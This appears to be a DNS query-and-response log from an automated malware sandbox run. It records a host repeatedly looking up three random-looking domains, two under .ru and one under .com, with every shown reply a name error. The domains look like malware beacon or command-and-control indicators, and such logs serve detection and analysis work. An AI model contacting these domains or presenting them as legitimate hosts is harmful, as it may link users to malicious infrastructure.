                        Apr 26, 2023 12:40:33.436820030 CEST192.168.2.21.1.1.10x4dcbStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.469172955 CEST192.168.2.21.1.1.10x5eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.785164118 CEST192.168.2.21.1.1.10x5599Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.814142942 CEST192.168.2.21.1.1.10x376dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.843358994 CEST192.168.2.21.1.1.10x967aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.172050953 CEST192.168.2.21.1.1.10xc081Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.195338011 CEST192.168.2.21.1.1.10xb027Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.219078064 CEST192.168.2.21.1.1.10x27cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.459341049 CEST192.168.2.21.1.1.10xaa24Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.531223059 CEST192.168.2.21.1.1.10x578Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.554574013 CEST192.168.2.21.1.1.10x57f7Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.873024940 CEST192.168.2.21.1.1.10x1d14Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.895971060 CEST192.168.2.21.1.1.10xc69Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:34.921793938 CEST192.168.2.21.1.1.10x276aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.216314077 CEST192.168.2.21.1.1.10x427bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.241005898 CEST192.168.2.21.1.1.10xc34cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.263521910 CEST192.168.2.21.1.1.10xc44eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.573321104 CEST192.168.2.21.1.1.10x3d6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.598959923 CEST192.168.2.21.1.1.10x2824Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.659526110 CEST192.168.2.21.1.1.10x85f0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:35.997842073 CEST192.168.2.21.1.1.10x4848Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.022722006 CEST192.168.2.21.1.1.10x4246Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.049016953 CEST192.168.2.21.1.1.10x8a16Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.363250971 CEST192.168.2.21.1.1.10x89dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.386097908 CEST192.168.2.21.1.1.10x346eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.413712978 CEST192.168.2.21.1.1.10xe143Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.716461897 CEST192.168.2.21.1.1.10xf38aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.743735075 CEST192.168.2.21.1.1.10x5b98Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:36.766382933 CEST192.168.2.21.1.1.10x7812Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.087953091 CEST192.168.2.21.1.1.10x7fc2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.111561060 CEST192.168.2.21.1.1.10xf058Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.133858919 CEST192.168.2.21.1.1.10x4a44Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.432924986 CEST192.168.2.21.1.1.10xbe3eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.455626965 CEST192.168.2.21.1.1.10xc623Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.478372097 CEST192.168.2.21.1.1.10xb642Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.793977976 CEST192.168.2.21.1.1.10x6c8bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.817713976 CEST192.168.2.21.1.1.10x4b42Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:37.843434095 CEST192.168.2.21.1.1.10x6de9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.163031101 CEST192.168.2.21.1.1.10x8df9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.188802958 CEST192.168.2.21.1.1.10xd479Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.212096930 CEST192.168.2.21.1.1.10x8cedStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.534480095 CEST192.168.2.21.1.1.10x2ecfStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.559514046 CEST192.168.2.21.1.1.10xad07Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:38.582621098 CEST192.168.2.21.1.1.10x605cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.069262028 CEST192.168.2.21.1.1.10xfbd6Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.092129946 CEST192.168.2.21.1.1.10x815fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.122145891 CEST192.168.2.21.1.1.10xafc4Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.548624992 CEST192.168.2.21.1.1.10x20a3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.579273939 CEST192.168.2.21.1.1.10x3bcaStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.605248928 CEST192.168.2.21.1.1.10xed6dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.955615044 CEST192.168.2.21.1.1.10xa85dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:39.984989882 CEST192.168.2.21.1.1.10x1094Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.007111073 CEST192.168.2.21.1.1.10xb12Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.336962938 CEST192.168.2.21.1.1.10xc809Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.360240936 CEST192.168.2.21.1.1.10xa424Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.383579969 CEST192.168.2.21.1.1.10x8a9cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.720757008 CEST192.168.2.21.1.1.10x9382Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.744604111 CEST192.168.2.21.1.1.10x37b9Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.769809961 CEST192.168.2.21.1.1.10xe1d1Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.072154999 CEST192.168.2.21.1.1.10xa9c2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.095736027 CEST192.168.2.21.1.1.10xe031Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.117832899 CEST192.168.2.21.1.1.10xc2dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.425863028 CEST192.168.2.21.1.1.10x5117Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.451361895 CEST192.168.2.21.1.1.10xc41aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.474431992 CEST192.168.2.21.1.1.10x7d31Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.785420895 CEST192.168.2.21.1.1.10xdd8bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.808288097 CEST192.168.2.21.1.1.10x231aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.835091114 CEST192.168.2.21.1.1.10xcf0cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.194823027 CEST192.168.2.21.1.1.10xc2ebStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.223387003 CEST192.168.2.21.1.1.10xa6fdStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.251871109 CEST192.168.2.21.1.1.10x8f9eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.564302921 CEST192.168.2.21.1.1.10xf76aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.587713003 CEST192.168.2.21.1.1.10xb0adStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.615147114 CEST192.168.2.21.1.1.10x8a0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.940475941 CEST192.168.2.21.1.1.10x9b04Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.963718891 CEST192.168.2.21.1.1.10xadd2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.985850096 CEST192.168.2.21.1.1.10x2a2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.272308111 CEST192.168.2.21.1.1.10x132aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.295399904 CEST192.168.2.21.1.1.10x561eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.322148085 CEST192.168.2.21.1.1.10x8d9aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.644110918 CEST192.168.2.21.1.1.10xcff2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.676831961 CEST192.168.2.21.1.1.10x1be0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.699157000 CEST192.168.2.21.1.1.10x57e2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.062434912 CEST192.168.2.21.1.1.10xda0cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.084846020 CEST192.168.2.21.1.1.10xc19bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.119399071 CEST192.168.2.21.1.1.10x91c5Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.494345903 CEST192.168.2.21.1.1.10x2e30Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.518578053 CEST192.168.2.21.1.1.10x153Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.544121027 CEST192.168.2.21.1.1.10xa5ceStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.882415056 CEST192.168.2.21.1.1.10x1219Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.906562090 CEST192.168.2.21.1.1.10x2736Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.932466984 CEST192.168.2.21.1.1.10x62d8Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.266325951 CEST192.168.2.21.1.1.10x6960Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.291740894 CEST192.168.2.21.1.1.10xf74Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.400538921 CEST192.168.2.21.1.1.10x70d9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.643866062 CEST192.168.2.21.1.1.10x2acaStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.731718063 CEST192.168.2.21.1.1.10x3e20Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.755099058 CEST192.168.2.21.1.1.10x9a89Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.031048059 CEST192.168.2.21.1.1.10x7fbStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.054236889 CEST192.168.2.21.1.1.10x1fc8Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.077351093 CEST192.168.2.21.1.1.10xeb1eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.487747908 CEST192.168.2.21.1.1.10xea7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.512701988 CEST192.168.2.21.1.1.10x5009Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.535870075 CEST192.168.2.21.1.1.10x8c3cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.770996094 CEST192.168.2.21.1.1.10xc7bcStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.794178963 CEST192.168.2.21.1.1.10xae9eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.816823959 CEST192.168.2.21.1.1.10x175Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.193304062 CEST192.168.2.21.1.1.10x9b71Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.216890097 CEST192.168.2.21.1.1.10x4367Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.240839958 CEST192.168.2.21.1.1.10xad00Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.758004904 CEST192.168.2.21.1.1.10xaee0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.789252043 CEST192.168.2.21.1.1.10x681dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.812813997 CEST192.168.2.21.1.1.10x3802Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.153791904 CEST192.168.2.21.1.1.10x811fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.179054022 CEST192.168.2.21.1.1.10x8255Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.206893921 CEST192.168.2.21.1.1.10x94cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.539597988 CEST192.168.2.21.1.1.10xb9d3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.564369917 CEST192.168.2.21.1.1.10xb0d8Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.591605902 CEST192.168.2.21.1.1.10x53e2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.905669928 CEST192.168.2.21.1.1.10x1c1Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.934456110 CEST192.168.2.21.1.1.10x51daStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.957217932 CEST192.168.2.21.1.1.10x35f4Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.270684958 CEST192.168.2.21.1.1.10xe16fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.378237963 CEST192.168.2.21.1.1.10xeb39Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.406935930 CEST192.168.2.21.1.1.10xb10aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.709482908 CEST192.168.2.21.1.1.10xaabdStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.734848976 CEST192.168.2.21.1.1.10x7779Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.757905960 CEST192.168.2.21.1.1.10x22abStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.134951115 CEST192.168.2.21.1.1.10x1d2dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.184127092 CEST192.168.2.21.1.1.10xd9a3Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.207884073 CEST192.168.2.21.1.1.10x6534Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.522583961 CEST192.168.2.21.1.1.10x107eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.621102095 CEST192.168.2.21.1.1.10x991fStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.648551941 CEST192.168.2.21.1.1.10xefStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.980151892 CEST192.168.2.21.1.1.10x84c7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.003087044 CEST192.168.2.21.1.1.10xf1a0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.025228977 CEST192.168.2.21.1.1.10x4f20Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.468503952 CEST192.168.2.21.1.1.10x971Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.492110014 CEST192.168.2.21.1.1.10x2514Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.518815041 CEST192.168.2.21.1.1.10x4374Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.801219940 CEST192.168.2.21.1.1.10x210cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.860270977 CEST192.168.2.21.1.1.10x690dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.888705969 CEST192.168.2.21.1.1.10xf536Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.243951082 CEST192.168.2.21.1.1.10x8326Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.278228998 CEST192.168.2.21.1.1.10xd821Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.301156998 CEST192.168.2.21.1.1.10x8d50Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.671370029 CEST192.168.2.21.1.1.10xbfc9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.697660923 CEST192.168.2.21.1.1.10xba82Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.721177101 CEST192.168.2.21.1.1.10xa7ceStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.073817015 CEST192.168.2.21.1.1.10x2b58Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.101244926 CEST192.168.2.21.1.1.10x38f5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.127386093 CEST192.168.2.21.1.1.10x150cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.387171984 CEST192.168.2.21.1.1.10xe464Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                        Apr 26, 2023 12:39:36.603425980 CEST1.1.1.1192.168.2.20x4f3eName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.626112938 CEST1.1.1.1192.168.2.20xd18bName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.649741888 CEST1.1.1.1192.168.2.20x9582Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.931154966 CEST1.1.1.1192.168.2.20x71ebName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.955414057 CEST1.1.1.1192.168.2.20x6c9cName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.985285044 CEST1.1.1.1192.168.2.20x3eb8Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.299716949 CEST1.1.1.1192.168.2.20x7b14Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.324233055 CEST1.1.1.1192.168.2.20x120Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.347009897 CEST1.1.1.1192.168.2.20x248Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.759188890 CEST1.1.1.1192.168.2.20x3ca9Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.866163969 CEST1.1.1.1192.168.2.20x3dddName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.889755011 CEST1.1.1.1192.168.2.20xf887Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.215523005 CEST1.1.1.1192.168.2.20x1b52Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.251012087 CEST1.1.1.1192.168.2.20x39ccName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.273530006 CEST1.1.1.1192.168.2.20xb5b3Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.589240074 CEST1.1.1.1192.168.2.20x204bName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.658416033 CEST1.1.1.1192.168.2.20x272bName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.683018923 CEST1.1.1.1192.168.2.20x9b76Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.976289988 CEST1.1.1.1192.168.2.20x1a31Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.036410093 CEST1.1.1.1192.168.2.20xaa3eName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.060142040 CEST1.1.1.1192.168.2.20x28d3Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.369873047 CEST1.1.1.1192.168.2.20xc7bfName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.392354965 CEST1.1.1.1192.168.2.20x8662Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.416460991 CEST1.1.1.1192.168.2.20x6d54Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.700114012 CEST1.1.1.1192.168.2.20xc493Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.725884914 CEST1.1.1.1192.168.2.20x174eName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.748420954 CEST1.1.1.1192.168.2.20xef36Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.027004004 CEST1.1.1.1192.168.2.20x36Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.053421974 CEST1.1.1.1192.168.2.20xe425Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.081661940 CEST1.1.1.1192.168.2.20x66ecName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.351634979 CEST1.1.1.1192.168.2.20xb35Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.421119928 CEST1.1.1.1192.168.2.20x1cdcName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.446494102 CEST1.1.1.1192.168.2.20xb4a0Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.800682068 CEST1.1.1.1192.168.2.20x3805Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.824227095 CEST1.1.1.1192.168.2.20xef79Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.853950024 CEST1.1.1.1192.168.2.20xc5d1Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.135910034 CEST1.1.1.1192.168.2.20x2a0aName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.205368996 CEST1.1.1.1192.168.2.20x1bc5Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.228538990 CEST1.1.1.1192.168.2.20xe0bName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.513679981 CEST1.1.1.1192.168.2.20x3f95Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.537609100 CEST1.1.1.1192.168.2.20x607aName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.563388109 CEST1.1.1.1192.168.2.20xc621Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.881727934 CEST1.1.1.1192.168.2.20x1f6fName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.911837101 CEST1.1.1.1192.168.2.20x66b1Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.938281059 CEST1.1.1.1192.168.2.20x551bName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.215810061 CEST1.1.1.1192.168.2.20xa21fName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.241482973 CEST1.1.1.1192.168.2.20xda4eName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
